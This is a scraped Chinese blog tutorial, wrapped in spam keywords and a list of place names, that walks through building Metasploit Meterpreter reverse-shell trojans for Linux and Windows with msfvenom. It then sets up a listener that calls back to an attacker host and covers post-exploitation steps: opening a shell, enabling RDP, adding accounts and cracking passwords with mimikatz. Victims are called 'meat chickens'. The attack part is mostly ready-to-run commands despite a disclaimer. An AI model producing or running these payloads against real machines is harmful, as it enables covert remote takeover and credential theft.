最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

msfvenom生成木馬-Linux Wondows

2020-06-28 18:08 作者:無情劍客Burning  | 我要投稿

聲明:本篇內(nèi)容,禁止用作非法目的,謝絕一切形式的轉(zhuǎn)載。

當(dāng)你在無意間點擊一個鏈接后,當(dāng)你在不明情況安裝一個程序時,當(dāng)你忍不住點擊一個美女圖片的時候,你的設(shè)備可能就此淪陷了,成為了黑客眼中的"肉雞"。

kali Linux

Kali Linux是基于Debian的Linux發(fā)行版, 設(shè)計用于數(shù)字取證操作系統(tǒng)。由Offensive Security Ltd維護(hù)和資助。最先由Offensive Security的Mati Aharoni和Devon Kearns通過重寫B(tài)ackTrack來完成,BackTrack是他們之前寫的用于取證的Linux發(fā)行版 。

Metersploit

Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業(yè)人士識別安全性問題,驗證漏洞的緩解措施,并管理專家驅(qū)動的安全性進(jìn)行評估,提供真正的安全風(fēng)險情報。這些功能包括智能開發(fā),代碼審計,Web應(yīng)用程序掃描,社會工程。團(tuán)隊合作,在Metasploit和綜合報告提出了他們的發(fā)現(xiàn)。

Meterpreter

Meterpreter是 Metasploit 框架中的一個殺手锏,通常作為漏洞溢出后的攻擊在和使用, 攻擊在觸發(fā)漏洞后能夠返回給我們一個控制通道.

Linux攻擊

生成木馬

網(wǎng)絡(luò)上有好多生成木馬的方式,但是大多數(shù)都是相互copy,甚至有的還可能包含病毒,謹(jǐn)慎使用。網(wǎng)絡(luò)上下載的所有軟件都要慎用,除非是在官網(wǎng)上下載的。 生成一個使用于Linux 64位系統(tǒng)的木馬,生成木馬的命令如下:

  1. msfvenom -a x64 --platform linux ?-p linux/x64/meterpreter/reverse_tcp ?LHOST=192.168.42.49 LPORT=5555 ?-i 3 -f elf -o test

LHOST 代表Listening host。LPORT代表Listening port。后續(xù)介紹網(wǎng)絡(luò)的時候會詳細(xì)講解。

翻譯一下這個命令:平臺Linux x64架構(gòu),使用payload是linux/x64/meterpreter/reverse_tcp,目標(biāo)文件的格式是elf。可執(zhí)行目標(biāo)文件的名稱是test。 通過上面的命令,我們就就可以生成一個elf格式的test程序,當(dāng)在遠(yuǎn)端(也就是"肉雞")執(zhí)行這個程序的時候,如果本地開啟了監(jiān)聽,肉雞和本機(jī)之間就建立了一條通信的channel,通過這個木馬就能實現(xiàn)控制遠(yuǎn)端的肉雞了,邪惡的微笑。

開啟監(jiān)聽

  1. 開啟msf

  1. msfconsole

  1. 加載模塊

  1. msf5 > use exploit/multi/handler

  1. 設(shè)置payload

  1. msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

  1. 設(shè)置監(jiān)聽ip

  1. msf5 exploit(multi/handler) > set lhost 192.168..42.49

  1. 設(shè)置監(jiān)聽port

  1. msf5 exploit(multi/handler) > set LPORT 5555

  1. 執(zhí)行

  1. msf5 exploit(multi/handler) > exploit

攻擊效果

當(dāng)執(zhí)行玩exploit之后,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進(jìn)程等。

可以開啟一個shell,這樣基本等同于完全操控目標(biāo)計算機(jī)了。

通過查看whoami可知正是當(dāng)前登陸用戶的帳號。如何提升權(quán)限,后續(xù)會介紹。

Windows攻擊

生成木馬

  1. msfvenom -a x64 --platform windows ?-p windows/x64/meterpreter/reverse_tcp ?LHOST=192.168.42.49 LPORT=4444 ?-i 3 -f exe -o payload_test.exe

具體含義可參考上文。

開啟監(jiān)聽

  1. 開啟msf

  1. msfconsole

  1. 加載模塊

  1. msf5 > use exploit/multi/handler

  1. 設(shè)置payload

  1. msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

  1. 設(shè)置監(jiān)聽ip

  1. msf5 exploit(multi/handler) > set lhost 192.168..42.49

  1. 設(shè)置監(jiān)聽port

  1. msf5 exploit(multi/handler) > set LPORT 4444

  1. 執(zhí)行

  1. msf5 exploit(multi/handler) > exploit

攻擊效果

當(dāng)執(zhí)行玩exploit之后,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進(jìn)程等。同Linux。

查看那getuid是Administrator,管理員權(quán)限。在Windows下,這還不是最高的權(quán)限,最高的權(quán)限是system,至于如何提權(quán),后續(xù)會講解。

開啟一個shell,發(fā)現(xiàn)有亂碼,這是由于Linux和Windows采用的編碼方式不一致導(dǎo)致的??梢酝ㄟ^ chcp65001解決這個問題。

桌面截圖

開啟遠(yuǎn)程桌面

通過以下命令開啟rdp服務(wù)

  1. run post/windows/manager/enable_rdp

如圖:

添加用戶

帳號密碼破解

使用minikatz進(jìn)行密碼破解

遠(yuǎn)程桌面

通過 rdestop目標(biāo)ip-u賬戶,可以實現(xiàn)遠(yuǎn)程桌面的控制。


公眾號

更多內(nèi)容,歡迎關(guān)注我的公眾號:無情劍客



msfvenom生成木馬-Linux Wondows的評論 (共 條)

分享到微博請遵守國家法律
榕江县| 浮山县| 嫩江县| 连州市| 贡觉县| 景东| 黔西县| 盐池县| 新晃| 浠水县| 新化县| 白玉县| 丰都县| 平武县| 冕宁县| 惠来县| 崇阳县| 小金县| 广水市| 万宁市| 潜江市| 广元市| 息烽县| 华亭县| 泗洪县| 昭觉县| 山东省| 贵定县| 织金县| 西和县| 苏尼特左旗| 米易县| 顺昌县| 肥东县| 团风县| 铜陵市| 来凤县| 海盐县| 德州市| 五家渠市| 阜平县|